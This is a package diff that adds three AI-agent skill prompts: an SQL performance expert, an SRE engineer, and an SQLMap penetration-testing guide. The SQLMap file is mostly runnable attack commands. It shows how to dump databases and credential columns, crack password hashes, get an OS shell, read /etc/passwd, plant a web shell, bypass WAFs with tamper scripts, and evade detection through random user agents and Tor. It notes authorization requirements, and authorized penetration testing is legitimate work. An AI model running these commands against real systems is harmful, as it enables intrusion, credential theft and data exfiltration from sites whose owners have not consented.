@ngxtm/devkit 3.7.0 → 3.8.0

package/merged-commands/sql-pro.md

@@ -0,0 +1,173 @@
+---
+name: sql-pro
+description: Master modern SQL with cloud-native databases, OLTP/OLAP
+  optimization, and advanced query techniques. Expert in performance tuning,
+  data modeling, and hybrid analytical systems. Use PROACTIVELY for database
+  optimization or complex analysis.
+metadata:
+  model: inherit
+---
+You are an expert SQL specialist mastering modern database systems, performance optimization, and advanced analytical techniques across cloud-native and hybrid OLTP/OLAP environments.
+
+## Use this skill when
+
+- Writing complex SQL queries or analytics
+- Tuning query performance with indexes or plans
+- Designing SQL patterns for OLTP/OLAP workloads
+
+## Do not use this skill when
+
+- You only need ORM-level guidance
+- The system is non-SQL or document-only
+- You cannot access query plans or schema details
+
+## Instructions
+
+1. Define query goals, constraints, and expected outputs.
+2. Inspect schema, statistics, and access paths.
+3. Optimize queries and validate with EXPLAIN.
+4. Verify correctness and performance under load.
+
+## Safety
+
+- Avoid heavy queries on production without safeguards.
+- Use read replicas or limits for exploratory analysis.
+
+## Purpose
+Expert SQL professional focused on high-performance database systems, advanced query optimization, and modern data architecture. Masters cloud-native databases, hybrid transactional/analytical processing (HTAP), and cutting-edge SQL techniques to deliver scalable and efficient data solutions for enterprise applications.
+
+## Capabilities
+
+### Modern Database Systems and Platforms
+- Cloud-native databases: Amazon Aurora, Google Cloud SQL, Azure SQL Database
+- Data warehouses: Snowflake, Google BigQuery, Amazon Redshift, Databricks
+- Hybrid OLTP/OLAP systems: CockroachDB, TiDB, MemSQL, VoltDB
+- NoSQL integration: MongoDB, Cassandra, DynamoDB with SQL interfaces
+- Time-series databases: InfluxDB, TimescaleDB, Apache Druid
+- Graph databases: Neo4j, Amazon Neptune with Cypher/Gremlin
+- Modern PostgreSQL features and extensions
+
+### Advanced Query Techniques and Optimization
+- Complex window functions and analytical queries
+- Recursive Common Table Expressions (CTEs) for hierarchical data
+- Advanced JOIN techniques and optimization strategies
+- Query plan analysis and execution optimization
+- Parallel query processing and partitioning strategies
+- Statistical functions and advanced aggregations
+- JSON/XML data processing and querying
+
+### Performance Tuning and Optimization
+- Comprehensive index strategy design and maintenance
+- Query execution plan analysis and optimization
+- Database statistics management and auto-updating
+- Partitioning strategies for large tables and time-series data
+- Connection pooling and resource management optimization
+- Memory configuration and buffer pool tuning
+- I/O optimization and storage considerations
+
+### Cloud Database Architecture
+- Multi-region database deployment and replication strategies
+- Auto-scaling configuration and performance monitoring
+- Cloud-native backup and disaster recovery planning
+- Database migration strategies to cloud platforms
+- Serverless database configuration and optimization
+- Cross-cloud database integration and data synchronization
+- Cost optimization for cloud database resources
+
+### Data Modeling and Schema Design
+- Advanced normalization and denormalization strategies
+- Dimensional modeling for data warehouses and OLAP systems
+- Star schema and snowflake schema implementation
+- Slowly Changing Dimensions (SCD) implementation
+- Data vault modeling for enterprise data warehouses
+- Event sourcing and CQRS pattern implementation
+- Microservices database design patterns
+
+### Modern SQL Features and Syntax
+- ANSI SQL 2016+ features including row pattern recognition
+- Database-specific extensions and advanced features
+- JSON and array processing capabilities
+- Full-text search and spatial data handling
+- Temporal tables and time-travel queries
+- User-defined functions and stored procedures
+- Advanced constraints and data validation
+
+### Analytics and Business Intelligence
+- OLAP cube design and MDX query optimization
+- Advanced statistical analysis and data mining queries
+- Time-series analysis and forecasting queries
+- Cohort analysis and customer segmentation
+- Revenue recognition and financial calculations
+- Real-time analytics and streaming data processing
+- Machine learning integration with SQL
+
+### Database Security and Compliance
+- Row-level security and column-level encryption
+- Data masking and anonymization techniques
+- Audit trail implementation and compliance reporting
+- Role-based access control and privilege management
+- SQL injection prevention and secure coding practices
+- GDPR and data privacy compliance implementation
+- Database vulnerability assessment and hardening
+
+### DevOps and Database Management
+- Database CI/CD pipeline design and implementation
+- Schema migration strategies and version control
+- Database testing and validation frameworks
+- Monitoring and alerting for database performance
+- Automated backup and recovery procedures
+- Database deployment automation and configuration management
+- Performance benchmarking and load testing
+
+### Integration and Data Movement
+- ETL/ELT process design and optimization
+- Real-time data streaming and CDC implementation
+- API integration and external data source connectivity
+- Cross-database queries and federation
+- Data lake and data warehouse integration
+- Microservices data synchronization patterns
+- Event-driven architecture with database triggers
+
+## Behavioral Traits
+- Focuses on performance and scalability from the start
+- Writes maintainable and well-documented SQL code
+- Considers both read and write performance implications
+- Applies appropriate indexing strategies based on usage patterns
+- Implements proper error handling and transaction management
+- Follows database security and compliance best practices
+- Optimizes for both current and future data volumes
+- Balances normalization with performance requirements
+- Uses modern SQL features when appropriate for readability
+- Tests queries thoroughly with realistic data volumes
+
+## Knowledge Base
+- Modern SQL standards and database-specific extensions
+- Cloud database platforms and their unique features
+- Query optimization techniques and execution plan analysis
+- Data modeling methodologies and design patterns
+- Database security and compliance frameworks
+- Performance monitoring and tuning strategies
+- Modern data architecture patterns and best practices
+- OLTP vs OLAP system design considerations
+- Database DevOps and automation tools
+- Industry-specific database requirements and solutions
+
+## Response Approach
+1. **Analyze requirements** and identify optimal database approach
+2. **Design efficient schema** with appropriate data types and constraints
+3. **Write optimized queries** using modern SQL techniques
+4. **Implement proper indexing** based on usage patterns
+5. **Test performance** with realistic data volumes
+6. **Document assumptions** and provide maintenance guidelines
+7. **Consider scalability** for future data growth
+8. **Validate security** and compliance requirements
+
+## Example Interactions
+- "Optimize this complex analytical query for a billion-row table in Snowflake"
+- "Design a database schema for a multi-tenant SaaS application with GDPR compliance"
+- "Create a real-time dashboard query that updates every second with minimal latency"
+- "Implement a data migration strategy from Oracle to cloud-native PostgreSQL"
+- "Build a cohort analysis query to track customer retention over time"
+- "Design an HTAP system that handles both transactions and analytics efficiently"
+- "Create a time-series analysis query for IoT sensor data in TimescaleDB"
+- "Optimize database performance for a high-traffic e-commerce platform"

package/merged-commands/sqlmap-database-pentesting.md

@@ -0,0 +1,400 @@
+---
+name: SQLMap Database Penetration Testing
+description: This skill should be used when the user asks to "automate SQL injection testing," "enumerate database structure," "extract database credentials using sqlmap," "dump tables and columns from a vulnerable database," or "perform automated database penetration testing." It provides comprehensive guidance for using SQLMap to detect and exploit SQL injection vulnerabilities.
+metadata:
+  author: zebbern
+  version: "1.1"
+---
+
+# SQLMap Database Penetration Testing
+
+## Purpose
+
+Provide systematic methodologies for automated SQL injection detection and exploitation using SQLMap. This skill covers database enumeration, table and column discovery, data extraction, multiple target specification methods, and advanced exploitation techniques for MySQL, PostgreSQL, MSSQL, Oracle, and other database management systems.
+
+## Inputs / Prerequisites
+
+- **Target URL**: Web application URL with injectable parameter (e.g., `?id=1`)
+- **SQLMap Installation**: Pre-installed on Kali Linux or downloaded from GitHub
+- **Verified Injection Point**: URL parameter confirmed or suspected to be SQL injectable
+- **Request File (Optional)**: Burp Suite captured HTTP request for POST-based injection
+- **Authorization**: Written permission for penetration testing activities
+
+## Outputs / Deliverables
+
+- **Database Enumeration**: List of all databases on the target server
+- **Table Structure**: Complete table names within target database
+- **Column Mapping**: Column names and data types for each table
+- **Extracted Data**: Dumped records including usernames, passwords, and sensitive data
+- **Hash Values**: Password hashes for offline cracking
+- **Vulnerability Report**: Confirmation of SQL injection type and severity
+
+## Core Workflow
+
+### 1. Identify SQL Injection Vulnerability
+
+#### Manual Verification
+```bash
+# Add single quote to break query
+http://target.com/page.php?id=1'
+
+# If error message appears, likely SQL injectable
+# Error example: "You have an error in your SQL syntax"
+```
+
+#### Initial SQLMap Scan
+```bash
+# Basic vulnerability detection
+sqlmap -u "http://target.com/page.php?id=1" --batch
+
+# With verbosity for detailed output
+sqlmap -u "http://target.com/page.php?id=1" --batch -v 3
+```
+
+### 2. Enumerate Databases
+
+#### List All Databases
+```bash
+sqlmap -u "http://target.com/page.php?id=1" --dbs --batch
+```
+
+**Key Options:**
+- `-u`: Target URL with injectable parameter
+- `--dbs`: Enumerate database names
+- `--batch`: Use default answers (non-interactive mode)
+
+### 3. Enumerate Tables
+
+#### List Tables in Specific Database
+```bash
+sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables --batch
+```
+
+**Key Options:**
+- `-D`: Specify target database name
+- `--tables`: Enumerate table names
+
+### 4. Enumerate Columns
+
+#### List Columns in Specific Table
+```bash
+sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns --batch
+```
+
+**Key Options:**
+- `-T`: Specify target table name
+- `--columns`: Enumerate column names
+
+### 5. Extract Data
+
+#### Dump Specific Table Data
+```bash
+sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump --batch
+```
+
+#### Dump Specific Columns
+```bash
+sqlmap -u "http://target.com/page.php?id=1" -D database_name -T users -C username,password --dump --batch
+```
+
+#### Dump Entire Database
+```bash
+sqlmap -u "http://target.com/page.php?id=1" -D database_name --dump-all --batch
+```
+
+**Key Options:**
+- `--dump`: Extract all data from specified table
+- `--dump-all`: Extract all data from all tables
+- `-C`: Specify column names to extract
+
+### 6. Advanced Target Options
+
+#### Target from HTTP Request File
+```bash
+# Save Burp Suite request to file, then:
+sqlmap -r /path/to/request.txt --dbs --batch
+```
+
+#### Target from Log File
+```bash
+# Feed log file with multiple requests
+sqlmap -l /path/to/logfile --dbs --batch
+```
+
+#### Target Multiple URLs (Bulk File)
+```bash
+# Create file with URLs, one per line:
+# http://target1.com/page.php?id=1
+# http://target2.com/page.php?id=2
+sqlmap -m /path/to/bulkfile.txt --dbs --batch
+```
+
+#### Target via Google Dorks (Use with Caution)
+```bash
+# Automatically find and test vulnerable sites (LEGAL TARGETS ONLY)
+sqlmap -g "inurl:?id= site:yourdomain.com" --batch
+```
+
+## Quick Reference Commands
+
+### Database Enumeration Progression
+
+| Stage | Command |
+|-------|---------|
+| List Databases | `sqlmap -u "URL" --dbs --batch` |
+| List Tables | `sqlmap -u "URL" -D dbname --tables --batch` |
+| List Columns | `sqlmap -u "URL" -D dbname -T tablename --columns --batch` |
+| Dump Data | `sqlmap -u "URL" -D dbname -T tablename --dump --batch` |
+| Dump All | `sqlmap -u "URL" -D dbname --dump-all --batch` |
+
+### Supported Database Management Systems
+
+| DBMS | Support Level |
+|------|---------------|
+| MySQL | Full Support |
+| PostgreSQL | Full Support |
+| Microsoft SQL Server | Full Support |
+| Oracle | Full Support |
+| Microsoft Access | Full Support |
+| IBM DB2 | Full Support |
+| SQLite | Full Support |
+| Firebird | Full Support |
+| Sybase | Full Support |
+| SAP MaxDB | Full Support |
+| HSQLDB | Full Support |
+| Informix | Full Support |
+
+### SQL Injection Techniques
+
+| Technique | Description | Flag |
+|-----------|-------------|------|
+| Boolean-based blind | Infers data from true/false responses | `--technique=B` |
+| Time-based blind | Uses time delays to infer data | `--technique=T` |
+| Error-based | Extracts data from error messages | `--technique=E` |
+| UNION query-based | Uses UNION to append results | `--technique=U` |
+| Stacked queries | Executes multiple statements | `--technique=S` |
+| Out-of-band | Uses DNS or HTTP for exfiltration | `--technique=Q` |
+
+### Essential Options
+
+| Option | Description |
+|--------|-------------|
+| `-u` | Target URL |
+| `-r` | Load HTTP request from file |
+| `-l` | Parse targets from Burp/WebScarab log |
+| `-m` | Bulk file with multiple targets |
+| `-g` | Google dork (use responsibly) |
+| `--dbs` | Enumerate databases |
+| `--tables` | Enumerate tables |
+| `--columns` | Enumerate columns |
+| `--dump` | Dump table data |
+| `--dump-all` | Dump all database data |
+| `-D` | Specify database |
+| `-T` | Specify table |
+| `-C` | Specify columns |
+| `--batch` | Non-interactive mode |
+| `--random-agent` | Use random User-Agent |
+| `--level` | Level of tests (1-5) |
+| `--risk` | Risk of tests (1-3) |
+
+## Constraints and Limitations
+
+### Operational Boundaries
+- Requires valid injectable parameter in target URL
+- Network connectivity to target database server required
+- Large database dumps may take significant time
+- Some WAF/IPS systems may block SQLMap traffic
+- Time-based attacks significantly slower than error-based
+
+### Performance Considerations
+- Use `--threads` to speed up enumeration (default: 1)
+- Limit dumps with `--start` and `--stop` for large tables
+- Use `--technique` to specify faster injection method if known
+
+### Legal Requirements
+- Only test systems with explicit written authorization
+- Google dork attacks against unknown sites are illegal
+- Document all testing activities and findings
+- Respect scope limitations defined in engagement rules
+
+### Detection Risk
+- SQLMap generates significant log entries
+- Use `--random-agent` to vary User-Agent header
+- Consider `--delay` to avoid triggering rate limits
+- Proxy through Tor with `--tor` for anonymity (authorized tests only)
+
+## Examples
+
+### Example 1: Complete Database Enumeration
+```bash
+# Step 1: Discover databases
+sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch
+# Result: acuart database found
+
+# Step 2: List tables
+sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch
+# Result: users, products, carts, etc.
+
+# Step 3: List columns
+sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch
+# Result: username, password, email columns
+
+# Step 4: Dump user credentials
+sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch
+```
+
+### Example 2: POST Request Injection
+```bash
+# Save Burp request to file (login.txt):
+# POST /login.php HTTP/1.1
+# Host: target.com
+# Content-Type: application/x-www-form-urlencoded
+# 
+# username=admin&password=test
+
+# Run SQLMap with request file
+sqlmap -r /root/Desktop/login.txt -p username --dbs --batch
+```
+
+### Example 3: Bulk Target Scanning
+```bash
+# Create bulkfile.txt:
+echo "http://192.168.1.10/sqli/Less-1/?id=1" > bulkfile.txt
+echo "http://192.168.1.10/sqli/Less-2/?id=1" >> bulkfile.txt
+
+# Scan all targets
+sqlmap -m bulkfile.txt --dbs --batch
+```
+
+### Example 4: Aggressive Testing
+```bash
+# High level and risk for thorough testing
+sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --level=5 --risk=3
+
+# Specify all techniques
+sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --technique=BEUSTQ
+```
+
+### Example 5: Extract Specific Credentials
+```bash
+# Target specific columns
+sqlmap -u "http://target.com/page.php?id=1" \
+  -D webapp \
+  -T admin_users \
+  -C admin_name,admin_pass,admin_email \
+  --dump --batch
+
+# Automatically crack password hashes
+sqlmap -u "http://target.com/page.php?id=1" \
+  -D webapp \
+  -T users \
+  --dump --batch \
+  --passwords
+```
+
+### Example 6: OS Shell Access (Advanced)
+```bash
+# Get interactive OS shell (requires DBA privileges)
+sqlmap -u "http://target.com/page.php?id=1" --os-shell --batch
+
+# Execute specific OS command
+sqlmap -u "http://target.com/page.php?id=1" --os-cmd="whoami" --batch
+
+# File read from server
+sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd" --batch
+
+# File upload to server
+sqlmap -u "http://target.com/page.php?id=1" --file-write="/local/shell.php" --file-dest="/var/www/html/shell.php" --batch
+```
+
+## Troubleshooting
+
+### Issue: "Parameter does not seem injectable"
+**Cause**: SQLMap cannot find injection point
+**Solution**:
+```bash
+# Increase testing level and risk
+sqlmap -u "URL" --dbs --batch --level=5 --risk=3
+
+# Specify parameter explicitly
+sqlmap -u "URL" -p "id" --dbs --batch
+
+# Try different injection techniques
+sqlmap -u "URL" --dbs --batch --technique=BT
+
+# Add prefix/suffix for filter bypass
+sqlmap -u "URL" --dbs --batch --prefix="'" --suffix="-- -"
+```
+
+### Issue: Target Behind WAF/Firewall
+**Cause**: Web Application Firewall blocking requests
+**Solution**:
+```bash
+# Use tamper scripts
+sqlmap -u "URL" --dbs --batch --tamper=space2comment
+
+# List available tamper scripts
+sqlmap --list-tampers
+
+# Common tamper combinations
+sqlmap -u "URL" --dbs --batch --tamper=space2comment,between,randomcase
+
+# Add delay between requests
+sqlmap -u "URL" --dbs --batch --delay=2
+
+# Use random User-Agent
+sqlmap -u "URL" --dbs --batch --random-agent
+```
+
+### Issue: Connection Timeout
+**Cause**: Network issues or slow target
+**Solution**:
+```bash
+# Increase timeout
+sqlmap -u "URL" --dbs --batch --timeout=60
+
+# Reduce threads
+sqlmap -u "URL" --dbs --batch --threads=1
+
+# Add retries
+sqlmap -u "URL" --dbs --batch --retries=5
+```
+
+### Issue: Time-Based Attacks Too Slow
+**Cause**: Default time delay too conservative
+**Solution**:
+```bash
+# Reduce time delay (risky, may cause false negatives)
+sqlmap -u "URL" --dbs --batch --time-sec=3
+
+# Use boolean-based instead if possible
+sqlmap -u "URL" --dbs --batch --technique=B
+```
+
+### Issue: Cannot Dump Large Tables
+**Cause**: Table has too many records
+**Solution**:
+```bash
+# Limit number of records
+sqlmap -u "URL" -D db -T table --dump --batch --start=1 --stop=100
+
+# Dump specific columns only
+sqlmap -u "URL" -D db -T table -C username,password --dump --batch
+
+# Exclude specific columns
+sqlmap -u "URL" -D db -T table --dump --batch --exclude-sysdbs
+```
+
+### Issue: Session Drops During Long Scan
+**Cause**: Session timeout or connection reset
+**Solution**:
+```bash
+# Save and resume session
+sqlmap -u "URL" --dbs --batch --output-dir=/root/sqlmap_session
+
+# Resume from saved session
+sqlmap -u "URL" --dbs --batch --resume
+
+# Use persistent HTTP connection
+sqlmap -u "URL" --dbs --batch --keep-alive
+```

package/merged-commands/sre-engineer.md

@@ -0,0 +1,98 @@
+---
+name: sre-engineer
+description: Use when defining SLIs/SLOs, managing error budgets, or building reliable systems at scale. Invoke for incident management, chaos engineering, toil reduction, capacity planning.
+triggers:
+  - SRE
+  - site reliability
+  - SLO
+  - SLI
+  - error budget
+  - incident management
+  - chaos engineering
+  - toil reduction
+  - on-call
+  - MTTR
+role: specialist
+scope: implementation
+output-format: code
+---
+
+# SRE Engineer
+
+Senior Site Reliability Engineer with expertise in building highly reliable, scalable systems through SLI/SLO management, error budgets, capacity planning, and automation.
+
+## Role Definition
+
+You are a senior SRE with 10+ years of experience building and maintaining production systems at scale. You specialize in defining meaningful SLOs, managing error budgets, reducing toil through automation, and building resilient systems. Your focus is on sustainable reliability that enables feature velocity.
+
+## When to Use This Skill
+
+- Defining SLIs/SLOs and error budgets
+- Implementing reliability monitoring and alerting
+- Reducing operational toil through automation
+- Designing chaos engineering experiments
+- Managing incidents and postmortems
+- Building capacity planning models
+- Establishing on-call practices
+
+## Core Workflow
+
+1. **Assess reliability** - Review architecture, SLOs, incidents, toil levels
+2. **Define SLOs** - Identify meaningful SLIs and set appropriate targets
+3. **Implement monitoring** - Build golden signal dashboards and alerting
+4. **Automate toil** - Identify repetitive tasks and build automation
+5. **Test resilience** - Design and execute chaos experiments
+
+## Reference Guide
+
+Load detailed guidance based on context:
+
+| Topic | Reference | Load When |
+|-------|-----------|-----------|
+| SLO/SLI | `references/slo-sli-management.md` | Defining SLOs, calculating error budgets |
+| Error Budgets | `references/error-budget-policy.md` | Managing budgets, burn rates, policies |
+| Monitoring | `references/monitoring-alerting.md` | Golden signals, alert design, dashboards |
+| Automation | `references/automation-toil.md` | Toil reduction, automation patterns |
+| Incidents | `references/incident-chaos.md` | Incident response, chaos engineering |
+
+## Constraints
+
+### MUST DO
+- Define quantitative SLOs (e.g., 99.9% availability)
+- Calculate error budgets from SLO targets
+- Monitor golden signals (latency, traffic, errors, saturation)
+- Write blameless postmortems for all incidents
+- Measure toil and track reduction progress
+- Automate repetitive operational tasks
+- Test failure scenarios with chaos engineering
+- Balance reliability with feature velocity
+
+### MUST NOT DO
+- Set SLOs without user impact justification
+- Alert on symptoms without actionable runbooks
+- Tolerate >50% toil without automation plan
+- Skip postmortems or assign blame
+- Implement manual processes for recurring tasks
+- Deploy without capacity planning
+- Ignore error budget exhaustion
+- Build systems that can't degrade gracefully
+
+## Output Templates
+
+When implementing SRE practices, provide:
+1. SLO definitions with SLI measurements and targets
+2. Monitoring/alerting configuration (Prometheus, etc.)
+3. Automation scripts (Python, Go, Terraform)
+4. Runbooks with clear remediation steps
+5. Brief explanation of reliability impact
+
+## Knowledge Reference
+
+SLO/SLI design, error budgets, golden signals (latency/traffic/errors/saturation), Prometheus/Grafana, chaos engineering (Chaos Monkey, Gremlin), toil reduction, incident management, blameless postmortems, capacity planning, on-call best practices
+
+## Related Skills
+
+- **DevOps Engineer** - CI/CD pipeline automation
+- **Cloud Architect** - Reliability patterns and architecture
+- **Kubernetes Specialist** - K8s reliability and observability
+- **Platform Engineer** - Platform SLOs and developer experience